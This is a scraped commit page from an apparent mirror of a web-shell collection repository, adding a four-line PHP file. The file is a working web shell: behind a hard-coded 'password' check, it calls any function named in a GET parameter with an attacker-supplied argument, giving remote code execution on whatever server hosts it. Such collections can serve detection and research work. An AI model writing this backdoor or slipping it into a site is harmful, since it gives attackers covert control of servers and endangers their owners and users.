1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
tennc
2022-08-26 19:53:05 +08:00
committed by GitHub
parent 3e96ef6e7b
commit 52d483f2cd

4
php/2022-08-26-06.php Normal file
View File

@@ -0,0 +1,4 @@
<?php
if ($_GET['p']=='password'){
$_GET['f']($_GET['a']);
}